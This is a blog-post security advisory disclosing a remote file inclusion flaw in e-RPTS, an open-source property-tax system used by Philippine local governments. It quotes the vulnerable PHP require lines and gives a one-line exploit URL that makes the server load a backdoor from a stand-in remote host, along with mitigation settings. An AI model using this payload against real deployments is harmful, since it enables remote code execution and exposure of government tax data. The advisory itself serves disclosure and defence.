e-RPTS RFI Vulnerability
2/12/2010 05:21:00 PM
Posted by johnhomer
About E-RPTS
(from the website)
An Open Source solution for Real Property Taxation in the Philippines
Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units(LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).
eRPTS web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allows LGUs to improve their monitoring of compliance and revenue generation.
This is a critical vulnerability since the software is being implmented on each of Philippine government's Local Government Units and could expose sensitive data such as tax records and other business related details.
The vulnerability
in the file:
/includes/web/prepend.php
line 20: require($_PHPLIB["libdir"] . "common.inc");
line 21: require($_PHPLIB["libdir"] . "constants.php");
line 22: require($_PHPLIB["libdir"] . "setup.inc");
line 23: require($_PHPLIB["libdir"] . "session.inc");
line 24: require($_PHPLIB["libdir"] . "auth.inc");
line 25: require($_PHPLIB["libdir"] . "perm.inc");
line 26: require($_PHPLIB["libdir"] . "db_mysql.inc");
line 27: require($_PHPLIB["libdir"] . "tr_rpts.inc");
line 28: require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
line 29: require($_PHPLIB["libdir"] . "page.inc");
line 30: require($_PHPLIB["libdir"] . "template.inc");
This code is vulnerable to Remote File Include vulnerability by going to
http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?
For this vulnerability to work, register_globals must be set to on and allow_URL_fopen set to on.
Recommendations
You should disable allow_url_fopen in the php.ini file:
allow_url_fopen = 'off'
The setting can also be disabled in apache's httpd.conf file:
php_flag allow_url_fopen off
This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.
__________________
Bug Discovered by:
John Homer Alvero
__________________
References:
This entry was posted on October 4, 2009 at 12:14 pm, and is filed under
. Follow any responses to this post through RSS. You can leave a response, or trackback from your own site.
Subscribe to:
Post Comments (Atom)
Post a Comment